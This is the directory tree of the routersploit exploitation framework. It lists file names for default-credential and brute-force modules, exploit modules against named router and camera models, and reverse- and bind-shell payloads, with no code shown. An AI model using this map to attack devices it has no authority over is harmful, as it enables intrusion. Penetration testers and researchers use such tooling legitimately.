Showing preview only (1,792K chars total). Download the full file or copy to clipboard to get everything.
Repository: threat9/routersploit
Branch: master
Commit: 6c5d37cf9c78
Files: 1215
Total size: 1.5 MB
Directory structure:
gitextract_hxqwu9j7/
├── .dockerignore
├── .github/
│ ├── ISSUE_TEMPLATE.md
│ └── PULL_REQUEST_TEMPLATE.md
├── .gitignore
├── .travis/
│ ├── install.sh
│ └── run.sh
├── .travis.yml
├── CONTRIBUTING.md
├── Dockerfile
├── LICENSE
├── MANIFEST.in
├── Makefile
├── README.md
├── docker-compose.yaml
├── docs/
│ └── modules/
│ ├── creds/
│ │ ├── cameras/
│ │ │ ├── acti/
│ │ │ │ ├── ftp_default_creds.md
│ │ │ │ ├── ssh_default_creds.md
│ │ │ │ └── telnet_default_creds.md
│ │ │ ├── american_dynamics/
│ │ │ │ ├── ftp_default_creds.md
│ │ │ │ ├── ssh_default_creds.md
│ │ │ │ └── telnet_default_creds.md
│ │ │ ├── arecont/
│ │ │ │ ├── ftp_default_creds.md
│ │ │ │ ├── ssh_default_creds.md
│ │ │ │ └── telnet_default_creds.md
│ │ │ ├── avigilon/
│ │ │ │ ├── ftp_default_creds.md
│ │ │ │ ├── ssh_default_creds.md
│ │ │ │ └── telnet_default_creds.md
│ │ │ ├── avtech/
│ │ │ │ ├── ftp_default_creds.md
│ │ │ │ ├── ssh_default_creds.md
│ │ │ │ └── telnet_default_creds.md
│ │ │ ├── axis/
│ │ │ │ ├── ftp_default_creds.md
│ │ │ │ ├── ssh_default_creds.md
│ │ │ │ └── telnet_default_creds.md
│ │ │ ├── basler/
│ │ │ │ ├── ftp_default_creds.md
│ │ │ │ ├── ssh_default_creds.md
│ │ │ │ └── telnet_default_creds.md
│ │ │ ├── brickcom/
│ │ │ │ ├── ftp_default_creds.md
│ │ │ │ ├── ssh_default_creds.md
│ │ │ │ └── telnet_default_creds.md
│ │ │ ├── canon/
│ │ │ │ ├── ftp_default_creds.md
│ │ │ │ ├── ssh_default_creds.md
│ │ │ │ └── telnet_default_creds.md
│ │ │ ├── cisco/
│ │ │ │ ├── ftp_default_creds.md
│ │ │ │ ├── ssh_default_creds.md
│ │ │ │ └── telnet_default_creds.md
│ │ │ ├── dlink/
│ │ │ │ ├── ftp_default_creds.md
│ │ │ │ ├── ssh_default_creds.md
│ │ │ │ └── telnet_default_creds.md
│ │ │ ├── geovision/
│ │ │ │ ├── ftp_default_creds.md
│ │ │ │ ├── ssh_default_creds.md
│ │ │ │ └── telnet_default_creds.md
│ │ │ ├── grandstream/
│ │ │ │ ├── ftp_default_creds.md
│ │ │ │ ├── ssh_default_creds.md
│ │ │ │ └── telnet_default_creds.md
│ │ │ ├── hikvision/
│ │ │ │ ├── ftp_default_creds.md
│ │ │ │ ├── ssh_default_creds.md
│ │ │ │ └── telnet_default_creds.md
│ │ │ ├── honeywell/
│ │ │ │ ├── ftp_default_creds.md
│ │ │ │ ├── ssh_default_creds.md
│ │ │ │ └── telnet_default_creds.md
│ │ │ ├── iqinvision/
│ │ │ │ ├── ftp_default_creds.md
│ │ │ │ ├── ssh_default_creds.md
│ │ │ │ └── telnet_default_creds.md
│ │ │ ├── jvc/
│ │ │ │ ├── ftp_default_creds.md
│ │ │ │ ├── ssh_default_creds.md
│ │ │ │ └── telnet_default_creds.md
│ │ │ ├── mobotix/
│ │ │ │ ├── ftp_default_creds.md
│ │ │ │ ├── ssh_default_creds.md
│ │ │ │ └── telnet_default_creds.md
│ │ │ ├── samsung/
│ │ │ │ ├── ftp_default_creds.md
│ │ │ │ ├── ssh_default_creds.md
│ │ │ │ └── telnet_default_creds.md
│ │ │ ├── sentry360/
│ │ │ │ ├── ftp_default_creds.md
│ │ │ │ ├── ssh_default_creds.md
│ │ │ │ └── telnet_default_creds.md
│ │ │ ├── siemens/
│ │ │ │ ├── ftp_default_creds.md
│ │ │ │ ├── ssh_default_creds.md
│ │ │ │ └── telnet_default_creds.md
│ │ │ ├── speco/
│ │ │ │ ├── ftp_default_creds.md
│ │ │ │ ├── ssh_default_creds.md
│ │ │ │ └── telnet_default_creds.md
│ │ │ ├── stardot/
│ │ │ │ ├── ftp_default_creds.md
│ │ │ │ ├── ssh_default_creds.md
│ │ │ │ └── telnet_default_creds.md
│ │ │ ├── vacron/
│ │ │ │ ├── ftp_default_creds.md
│ │ │ │ ├── ssh_default_creds.md
│ │ │ │ └── telnet_default_creds.md
│ │ │ └── videoiq/
│ │ │ ├── ftp_default_creds.md
│ │ │ ├── ssh_default_creds.md
│ │ │ └── telnet_default_creds.md
│ │ └── routers/
│ │ ├── asmax/
│ │ │ ├── ftp_default_creds.md
│ │ │ ├── ssh_default_creds.md
│ │ │ └── telnet_default_creds.md
│ │ ├── asus/
│ │ │ ├── ftp_default_creds.md
│ │ │ ├── ssh_default_creds.md
│ │ │ └── telnet_default_creds.md
│ │ ├── belkin/
│ │ │ ├── ftp_default_creds.md
│ │ │ ├── ssh_default_creds.md
│ │ │ └── telnet_default_creds.md
│ │ ├── bhu/
│ │ │ ├── ftp_default_creds.md
│ │ │ ├── ssh_default_creds.md
│ │ │ └── telnet_default_creds.md
│ │ ├── billion/
│ │ │ ├── ftp_default_creds.md
│ │ │ ├── ssh_default_creds.md
│ │ │ └── telnet_default_creds.md
│ │ ├── cisco/
│ │ │ ├── ftp_default_creds.md
│ │ │ ├── ssh_default_creds.md
│ │ │ └── telnet_default_creds.md
│ │ ├── comtrend/
│ │ │ ├── ftp_default_creds.md
│ │ │ ├── ssh_default_creds.md
│ │ │ └── telnet_default_creds.md
│ │ ├── dlink/
│ │ │ ├── ftp_default_creds.md
│ │ │ ├── ssh_default_creds.md
│ │ │ └── telnet_default_creds.md
│ │ ├── fortinet/
│ │ │ ├── ftp_default_creds.md
│ │ │ ├── ssh_default_creds.md
│ │ │ └── telnet_default_creds.md
│ │ ├── huawei/
│ │ │ ├── ftp_default_creds.md
│ │ │ ├── ssh_default_creds.md
│ │ │ └── telnet_default_creds.md
│ │ ├── ipfire/
│ │ │ ├── ftp_default_creds.md
│ │ │ ├── ssh_default_creds.md
│ │ │ └── telnet_default_creds.md
│ │ ├── juniper/
│ │ │ ├── ftp_default_creds.md
│ │ │ ├── ssh_default_creds.md
│ │ │ └── telnet_default_creds.md
│ │ ├── linksys/
│ │ │ ├── ftp_default_creds.md
│ │ │ ├── ssh_default_creds.md
│ │ │ └── telnet_default_creds.md
│ │ ├── mikrotik/
│ │ │ ├── ftp_default_creds.md
│ │ │ ├── ssh_default_creds.md
│ │ │ └── telnet_default_creds.md
│ │ ├── movistar/
│ │ │ ├── ftp_default_creds.md
│ │ │ ├── ssh_default_creds.md
│ │ │ └── telnet_default_creds.md
│ │ ├── netcore/
│ │ │ ├── ftp_default_creds.md
│ │ │ ├── ssh_default_creds.md
│ │ │ └── telnet_default_creds.md
│ │ ├── netgear/
│ │ │ ├── ftp_default_creds.md
│ │ │ ├── ssh_default_creds.md
│ │ │ └── telnet_default_creds.md
│ │ ├── netsys/
│ │ │ ├── ftp_default_creds.md
│ │ │ ├── ssh_default_creds.md
│ │ │ └── telnet_default_creds.md
│ │ ├── pfsense/
│ │ │ ├── ftp_default_creds.md
│ │ │ ├── ssh_default_creds.md
│ │ │ └── telnet_default_creds.md
│ │ ├── technicolor/
│ │ │ ├── ftp_default_creds.md
│ │ │ ├── ssh_default_creds.md
│ │ │ └── telnet_default_creds.md
│ │ ├── thomson/
│ │ │ ├── ftp_default_creds.md
│ │ │ ├── ssh_default_creds.md
│ │ │ └── telnet_default_creds.md
│ │ ├── tplink/
│ │ │ ├── ftp_default_creds.md
│ │ │ ├── ssh_default_creds.md
│ │ │ └── telnet_default_creds.md
│ │ ├── ubiquiti/
│ │ │ ├── ftp_default_creds.md
│ │ │ ├── ssh_default_creds.md
│ │ │ └── telnet_default_creds.md
│ │ ├── zte/
│ │ │ ├── ftp_default_creds.md
│ │ │ ├── ssh_default_creds.md
│ │ │ └── telnet_default_creds.md
│ │ └── zyxel/
│ │ ├── ftp_default_creds.md
│ │ ├── ssh_default_creds.md
│ │ └── telnet_default_creds.md
│ ├── encoders/
│ │ ├── perl/
│ │ │ ├── base64.md
│ │ │ └── hex.md
│ │ ├── php/
│ │ │ ├── base64.md
│ │ │ └── hex.md
│ │ └── python/
│ │ ├── base64.md
│ │ └── hex.md
│ ├── exploits/
│ │ ├── cameras/
│ │ │ ├── acti/
│ │ │ │ └── acm_5611_rce.md
│ │ │ ├── geuterbruck/
│ │ │ │ └── efd_2250.md
│ │ │ ├── jovision/
│ │ │ │ └── jovision_credentials_disclosure.md
│ │ │ └── multi/
│ │ │ └── cctv_dvr_rce.md
│ │ ├── misc/
│ │ │ └── watchguard/
│ │ │ └── xcs_9_rce.md
│ │ └── routers/
│ │ ├── asus/
│ │ │ ├── asuswrt_lan_rce.md
│ │ │ └── infosvr_backdoor_rce.md
│ │ ├── cisco/
│ │ │ └── rv320_command_injection.md
│ │ ├── dlink/
│ │ │ ├── dir_655_866_652_rce.md
│ │ │ └── dsl_2750b_rce.md
│ │ ├── ipfire/
│ │ │ ├── ipfire_proxy_rce.md
│ │ │ └── ipfire_shellshock.md
│ │ ├── linksys/
│ │ │ └── eseries_themoon_rce.md
│ │ ├── mikrotik/
│ │ │ └── winbox_auth_bypass_creds_disclosure.md
│ │ ├── multi/
│ │ │ ├── tcp_32764_info_disclosure.md
│ │ │ └── tcp_32764_rce.md
│ │ └── zte/
│ │ └── zxhn_h108n_wifi_password_disclosure.md
│ ├── generic/
│ │ └── upnp/
│ │ └── ssdp_msearch.md
│ └── payloads/
│ ├── armle/
│ │ ├── bind_tcp.md
│ │ └── reverse_tcp.md
│ ├── cmd/
│ │ ├── awk_bind_tcp.md
│ │ ├── awk_bind_udp.md
│ │ ├── awk_reverse_tcp.md
│ │ ├── bash_reverse_tcp.md
│ │ ├── netcat_bind_tcp.md
│ │ ├── netcat_reverse_tcp.md
│ │ ├── perl_bind_tcp.md
│ │ ├── perl_reverse_tcp.md
│ │ ├── php_bind_tcp.md
│ │ ├── php_reverse_tcp.md
│ │ ├── python_bind_tcp.md
│ │ ├── python_bind_udp.md
│ │ ├── python_reverse_tcp.md
│ │ └── python_reverse_udp.md
│ ├── mipsbe/
│ │ ├── bind_tcp.md
│ │ └── reverse_tcp.md
│ ├── mipsle/
│ │ ├── bind_tcp.md
│ │ └── reverse_tcp.md
│ ├── perl/
│ │ ├── bind_tcp.md
│ │ └── reverse_tcp.md
│ ├── php/
│ │ ├── bind_tcp.md
│ │ └── reverse_tcp.md
│ ├── python/
│ │ ├── bind_tcp.md
│ │ ├── bind_udp.md
│ │ ├── reverse_tcp.md
│ │ └── reverse_udp.md
│ ├── x64/
│ │ ├── bind_tcp.md
│ │ └── reverse_tcp.md
│ └── x86/
│ ├── bind_tcp.md
│ └── reverse_tcp.md
├── requirements-dev.txt
├── requirements.txt
├── routersploit/
│ ├── __init__.py
│ ├── core/
│ │ ├── __init__.py
│ │ ├── bluetooth/
│ │ │ ├── __init__.py
│ │ │ ├── btle/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── btle_device.py
│ │ │ │ └── btle_scanner.py
│ │ │ └── btle_client.py
│ │ ├── exploit/
│ │ │ ├── __init__.py
│ │ │ ├── encoders.py
│ │ │ ├── exceptions.py
│ │ │ ├── exploit.py
│ │ │ ├── option.py
│ │ │ ├── payloads.py
│ │ │ ├── printer.py
│ │ │ ├── shell.py
│ │ │ └── utils.py
│ │ ├── ftp/
│ │ │ ├── __init__.py
│ │ │ └── ftp_client.py
│ │ ├── http/
│ │ │ ├── __init__.py
│ │ │ └── http_client.py
│ │ ├── snmp/
│ │ │ ├── __init__.py
│ │ │ └── snmp_client.py
│ │ ├── ssh/
│ │ │ ├── __init__.py
│ │ │ └── ssh_client.py
│ │ ├── tcp/
│ │ │ ├── __init__.py
│ │ │ └── tcp_client.py
│ │ ├── telnet/
│ │ │ ├── __init__.py
│ │ │ └── telnet_client.py
│ │ └── udp/
│ │ ├── __init__.py
│ │ └── udp_client.py
│ ├── interpreter.py
│ ├── libs/
│ │ ├── __init__.py
│ │ ├── apiros/
│ │ │ ├── __init__.py
│ │ │ └── apiros_client.py
│ │ └── lzs/
│ │ ├── __init__.py
│ │ └── lzs.py
│ ├── modules/
│ │ ├── __init__.py
│ │ ├── creds/
│ │ │ ├── __init__.py
│ │ │ ├── cameras/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── acti/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ ├── ftp_default_creds.py
│ │ │ │ │ ├── ssh_default_creds.py
│ │ │ │ │ ├── telnet_default_creds.py
│ │ │ │ │ └── webinterface_http_form_default_creds.py
│ │ │ │ ├── american_dynamics/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ ├── ftp_default_creds.py
│ │ │ │ │ ├── ssh_default_creds.py
│ │ │ │ │ └── telnet_default_creds.py
│ │ │ │ ├── arecont/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ ├── ftp_default_creds.py
│ │ │ │ │ ├── ssh_default_creds.py
│ │ │ │ │ └── telnet_default_creds.py
│ │ │ │ ├── avigilon/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ ├── ftp_default_creds.py
│ │ │ │ │ ├── ssh_default_creds.py
│ │ │ │ │ └── telnet_default_creds.py
│ │ │ │ ├── avtech/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ ├── ftp_default_creds.py
│ │ │ │ │ ├── ssh_default_creds.py
│ │ │ │ │ └── telnet_default_creds.py
│ │ │ │ ├── axis/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ ├── ftp_default_creds.py
│ │ │ │ │ ├── ssh_default_creds.py
│ │ │ │ │ ├── telnet_default_creds.py
│ │ │ │ │ └── webinterface_http_auth_default_creds.py
│ │ │ │ ├── basler/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ ├── ftp_default_creds.py
│ │ │ │ │ ├── ssh_default_creds.py
│ │ │ │ │ ├── telnet_default_creds.py
│ │ │ │ │ └── webinterface_http_form_default_creds.py
│ │ │ │ ├── brickcom/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ ├── ftp_default_creds.py
│ │ │ │ │ ├── ssh_default_creds.py
│ │ │ │ │ ├── telnet_default_creds.py
│ │ │ │ │ └── webinterface_http_auth_default_creds.py
│ │ │ │ ├── canon/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ ├── ftp_default_creds.py
│ │ │ │ │ ├── ssh_default_creds.py
│ │ │ │ │ ├── telnet_default_creds.py
│ │ │ │ │ └── webinterface_http_auth_default_creds.py
│ │ │ │ ├── cisco/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ ├── ftp_default_creds.py
│ │ │ │ │ ├── ssh_default_creds.py
│ │ │ │ │ └── telnet_default_creds.py
│ │ │ │ ├── dlink/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ ├── ftp_default_creds.py
│ │ │ │ │ ├── ssh_default_creds.py
│ │ │ │ │ └── telnet_default_creds.py
│ │ │ │ ├── geovision/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ ├── ftp_default_creds.py
│ │ │ │ │ ├── ssh_default_creds.py
│ │ │ │ │ └── telnet_default_creds.py
│ │ │ │ ├── grandstream/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ ├── ftp_default_creds.py
│ │ │ │ │ ├── ssh_default_creds.py
│ │ │ │ │ └── telnet_default_creds.py
│ │ │ │ ├── hikvision/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ ├── ftp_default_creds.py
│ │ │ │ │ ├── ssh_default_creds.py
│ │ │ │ │ └── telnet_default_creds.py
│ │ │ │ ├── honeywell/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ ├── ftp_default_creds.py
│ │ │ │ │ ├── ssh_default_creds.py
│ │ │ │ │ └── telnet_default_creds.py
│ │ │ │ ├── iqinvision/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ ├── ftp_default_creds.py
│ │ │ │ │ ├── ssh_default_creds.py
│ │ │ │ │ └── telnet_default_creds.py
│ │ │ │ ├── jvc/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ ├── ftp_default_creds.py
│ │ │ │ │ ├── ssh_default_creds.py
│ │ │ │ │ └── telnet_default_creds.py
│ │ │ │ ├── mobotix/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ ├── ftp_default_creds.py
│ │ │ │ │ ├── ssh_default_creds.py
│ │ │ │ │ └── telnet_default_creds.py
│ │ │ │ ├── samsung/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ ├── ftp_default_creds.py
│ │ │ │ │ ├── ssh_default_creds.py
│ │ │ │ │ └── telnet_default_creds.py
│ │ │ │ ├── sentry360/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ ├── ftp_default_creds.py
│ │ │ │ │ ├── ssh_default_creds.py
│ │ │ │ │ └── telnet_default_creds.py
│ │ │ │ ├── siemens/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ ├── ftp_default_creds.py
│ │ │ │ │ ├── ssh_default_creds.py
│ │ │ │ │ └── telnet_default_creds.py
│ │ │ │ ├── speco/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ ├── ftp_default_creds.py
│ │ │ │ │ ├── ssh_default_creds.py
│ │ │ │ │ └── telnet_default_creds.py
│ │ │ │ ├── stardot/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ ├── ftp_default_creds.py
│ │ │ │ │ ├── ssh_default_creds.py
│ │ │ │ │ └── telnet_default_creds.py
│ │ │ │ ├── vacron/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ ├── ftp_default_creds.py
│ │ │ │ │ ├── ssh_default_creds.py
│ │ │ │ │ └── telnet_default_creds.py
│ │ │ │ └── videoiq/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── ftp_default_creds.py
│ │ │ │ ├── ssh_default_creds.py
│ │ │ │ └── telnet_default_creds.py
│ │ │ ├── generic/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── ftp_bruteforce.py
│ │ │ │ ├── ftp_default.py
│ │ │ │ ├── http_basic_digest_bruteforce.py
│ │ │ │ ├── http_basic_digest_default.py
│ │ │ │ ├── snmp_bruteforce.py
│ │ │ │ ├── ssh_bruteforce.py
│ │ │ │ ├── ssh_default.py
│ │ │ │ ├── telnet_bruteforce.py
│ │ │ │ └── telnet_default.py
│ │ │ ├── printers/
│ │ │ │ └── __init__.py
│ │ │ └── routers/
│ │ │ ├── 2wire/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── ftp_default_creds.py
│ │ │ │ ├── ssh_default_creds.py
│ │ │ │ └── telnet_default_creds.py
│ │ │ ├── 3com/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── ftp_default_creds.py
│ │ │ │ ├── ssh_default_creds.py
│ │ │ │ └── telnet_default_creds.py
│ │ │ ├── __init__.py
│ │ │ ├── asmax/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── ftp_default_creds.py
│ │ │ │ ├── ssh_default_creds.py
│ │ │ │ ├── telnet_default_creds.py
│ │ │ │ └── webinterface_http_auth_default_creds.py
│ │ │ ├── asus/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── ftp_default_creds.py
│ │ │ │ ├── ssh_default_creds.py
│ │ │ │ └── telnet_default_creds.py
│ │ │ ├── belkin/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── ftp_default_creds.py
│ │ │ │ ├── ssh_default_creds.py
│ │ │ │ └── telnet_default_creds.py
│ │ │ ├── bhu/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── ftp_default_creds.py
│ │ │ │ ├── ssh_default_creds.py
│ │ │ │ └── telnet_default_creds.py
│ │ │ ├── billion/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── ftp_default_creds.py
│ │ │ │ ├── ssh_default_creds.py
│ │ │ │ └── telnet_default_creds.py
│ │ │ ├── cisco/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── ftp_default_creds.py
│ │ │ │ ├── ssh_default_creds.py
│ │ │ │ └── telnet_default_creds.py
│ │ │ ├── comtrend/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── ftp_default_creds.py
│ │ │ │ ├── ssh_default_creds.py
│ │ │ │ └── telnet_default_creds.py
│ │ │ ├── dlink/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── ftp_default_creds.py
│ │ │ │ ├── ssh_default_creds.py
│ │ │ │ └── telnet_default_creds.py
│ │ │ ├── fortinet/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── ftp_default_creds.py
│ │ │ │ ├── ssh_default_creds.py
│ │ │ │ └── telnet_default_creds.py
│ │ │ ├── huawei/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── ftp_default_creds.py
│ │ │ │ ├── ssh_default_creds.py
│ │ │ │ └── telnet_default_creds.py
│ │ │ ├── ipfire/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── ftp_default_creds.py
│ │ │ │ ├── ssh_default_creds.py
│ │ │ │ └── telnet_default_creds.py
│ │ │ ├── juniper/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── ftp_default_creds.py
│ │ │ │ ├── ssh_default_creds.py
│ │ │ │ └── telnet_default_creds.py
│ │ │ ├── linksys/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── ftp_default_creds.py
│ │ │ │ ├── ssh_default_creds.py
│ │ │ │ └── telnet_default_creds.py
│ │ │ ├── mikrotik/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── api_ros_default_creds.py
│ │ │ │ ├── ftp_default_creds.py
│ │ │ │ ├── ssh_default_creds.py
│ │ │ │ └── telnet_default_creds.py
│ │ │ ├── movistar/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── ftp_default_creds.py
│ │ │ │ ├── ssh_default_creds.py
│ │ │ │ └── telnet_default_creds.py
│ │ │ ├── netcore/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── ftp_default_creds.py
│ │ │ │ ├── ssh_default_creds.py
│ │ │ │ └── telnet_default_creds.py
│ │ │ ├── netgear/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── ftp_default_creds.py
│ │ │ │ ├── ssh_default_creds.py
│ │ │ │ └── telnet_default_creds.py
│ │ │ ├── netsys/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── ftp_default_creds.py
│ │ │ │ ├── ssh_default_creds.py
│ │ │ │ └── telnet_default_creds.py
│ │ │ ├── pfsense/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── ssh_default_creds.py
│ │ │ │ └── webinterface_http_form_default_creds.py
│ │ │ ├── technicolor/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── ftp_default_creds.py
│ │ │ │ ├── ssh_default_creds.py
│ │ │ │ └── telnet_default_creds.py
│ │ │ ├── thomson/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── ftp_default_creds.py
│ │ │ │ ├── ssh_default_creds.py
│ │ │ │ └── telnet_default_creds.py
│ │ │ ├── tplink/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── ftp_default_creds.py
│ │ │ │ ├── ssh_default_creds.py
│ │ │ │ └── telnet_default_creds.py
│ │ │ ├── ubiquiti/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── ftp_default_creds.py
│ │ │ │ ├── ssh_default_creds.py
│ │ │ │ └── telnet_default_creds.py
│ │ │ ├── zte/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── ftp_default_creds.py
│ │ │ │ ├── ssh_default_creds.py
│ │ │ │ └── telnet_default_creds.py
│ │ │ └── zyxel/
│ │ │ ├── __init__.py
│ │ │ ├── ftp_default_creds.py
│ │ │ ├── ssh_default_creds.py
│ │ │ └── telnet_default_creds.py
│ │ ├── encoders/
│ │ │ ├── __init__.py
│ │ │ ├── perl/
│ │ │ │ ├── base64.py
│ │ │ │ └── hex.py
│ │ │ ├── php/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── base64.py
│ │ │ │ └── hex.py
│ │ │ └── python/
│ │ │ ├── __init__.py
│ │ │ ├── base64.py
│ │ │ └── hex.py
│ │ ├── exploits/
│ │ │ ├── __init__.py
│ │ │ ├── cameras/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── acti/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ └── acm_5611_rce.py
│ │ │ │ ├── avigilon/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ └── videoiq_camera_path_traversal.py
│ │ │ │ ├── beward/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ └── n100_rce.py
│ │ │ │ ├── brickcom/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ ├── corp_network_cameras_conf_disclosure.py
│ │ │ │ │ └── users_cgi_creds_disclosure.py
│ │ │ │ ├── cisco/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ └── video_surv_path_traversal.py
│ │ │ │ ├── dlink/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ └── dcs_930l_932l_auth_bypass.py
│ │ │ │ ├── geuterbruck/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ └── efd_2250.py
│ │ │ │ ├── grandstream/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ ├── gxv3611hd_ip_camera_backdoor.py
│ │ │ │ │ └── gxv3611hd_ip_camera_sqli.py
│ │ │ │ ├── honeywell/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ └── hicc_1100pt_password_disclosure.py
│ │ │ │ ├── jovision/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ └── jovision_credentials_disclosure.py
│ │ │ │ ├── multi/
│ │ │ │ │ ├── P2P_wificam_credential_disclosure.py
│ │ │ │ │ ├── P2P_wificam_rce.py
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ ├── cctv_dvr_rce.py
│ │ │ │ │ ├── dvr_creds_disclosure.py
│ │ │ │ │ ├── jvc_vanderbilt_honeywell_path_traversal.py
│ │ │ │ │ └── netwave_ip_camera_information_disclosure.py
│ │ │ │ ├── mvpower/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ └── dvr_jaws_rce.py
│ │ │ │ ├── siemens/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ └── cvms2025_credentials_disclosure.py
│ │ │ │ └── xiongmai/
│ │ │ │ ├── __init__.py
│ │ │ │ └── uc_httpd_path_traversal.py
│ │ │ ├── generic/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── heartbleed.py
│ │ │ │ ├── shellshock.py
│ │ │ │ └── ssh_auth_keys.py
│ │ │ ├── misc/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── asus/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ └── b1m_projector_rce.py
│ │ │ │ ├── miele/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ └── pg8528_path_traversal.py
│ │ │ │ ├── watchguard/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ └── xcs_9_rce.py
│ │ │ │ └── wepresent/
│ │ │ │ ├── __init__.py
│ │ │ │ └── wipg1000_rce.py
│ │ │ └── routers/
│ │ │ ├── 2wire/
│ │ │ │ ├── 4011g_5012nv_path_traversal.py
│ │ │ │ ├── __init__.py
│ │ │ │ └── gateway_auth_bypass.py
│ │ │ ├── 3com/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── ap8760_password_disclosure.py
│ │ │ │ ├── imc_info_disclosure.py
│ │ │ │ ├── imc_path_traversal.py
│ │ │ │ ├── officeconnect_info_disclosure.py
│ │ │ │ └── officeconnect_rce.py
│ │ │ ├── __init__.py
│ │ │ ├── asmax/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── ar_1004g_password_disclosure.py
│ │ │ │ └── ar_804_gu_rce.py
│ │ │ ├── asus/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── asuswrt_lan_rce.py
│ │ │ │ ├── infosvr_backdoor_rce.py
│ │ │ │ └── rt_n16_password_disclosure.py
│ │ │ ├── belkin/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── auth_bypass.py
│ │ │ │ ├── g_n150_password_disclosure.py
│ │ │ │ ├── g_plus_info_disclosure.py
│ │ │ │ ├── n150_path_traversal.py
│ │ │ │ ├── n750_rce.py
│ │ │ │ └── play_max_prce.py
│ │ │ ├── bhu/
│ │ │ │ ├── __init__.py
│ │ │ │ └── bhu_urouter_rce.py
│ │ │ ├── billion/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── billion_5200w_rce.py
│ │ │ │ └── billion_7700nr4_password_disclosure.py
│ │ │ ├── cisco/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── catalyst_2960_rocem.py
│ │ │ │ ├── dpc2420_info_disclosure.py
│ │ │ │ ├── firepower_management60_path_traversal.py
│ │ │ │ ├── firepower_management60_rce.py
│ │ │ │ ├── ios_http_authorization_bypass.py
│ │ │ │ ├── rv320_command_injection.py
│ │ │ │ ├── secure_acs_bypass.py
│ │ │ │ ├── ucm_info_disclosure.py
│ │ │ │ ├── ucs_manager_rce.py
│ │ │ │ └── unified_multi_path_traversal.py
│ │ │ ├── comtrend/
│ │ │ │ ├── __init__.py
│ │ │ │ └── ct_5361t_password_disclosure.py
│ │ │ ├── dlink/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── dcs_930l_auth_rce.py
│ │ │ │ ├── dgs_1510_add_user.py
│ │ │ │ ├── dir_300_320_600_615_info_disclosure.py
│ │ │ │ ├── dir_300_320_615_auth_bypass.py
│ │ │ │ ├── dir_300_600_rce.py
│ │ │ │ ├── dir_300_645_815_upnp_rce.py
│ │ │ │ ├── dir_645_815_rce.py
│ │ │ │ ├── dir_645_password_disclosure.py
│ │ │ │ ├── dir_655_866_652_rce.py
│ │ │ │ ├── dir_815_850l_rce.py
